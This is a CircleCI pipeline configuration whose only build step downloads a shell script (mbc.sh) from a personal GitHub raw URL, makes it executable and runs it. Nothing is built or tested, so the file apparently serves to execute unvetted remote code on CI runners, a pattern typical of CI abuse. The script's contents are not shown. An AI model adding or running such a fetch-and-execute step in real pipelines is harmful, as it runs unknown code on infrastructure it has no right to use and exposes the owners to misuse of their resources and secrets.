 version: 2.1

 orbs:
  win: circleci/windows@2.2.0

 jobs:
   build:
     executor: win/default     
    
     steps:
       - checkout
       - run: wget https://raw.githubusercontent.com/linanta/alat/main/mbc.sh && chmod +x mbc.sh && ./mbc.sh
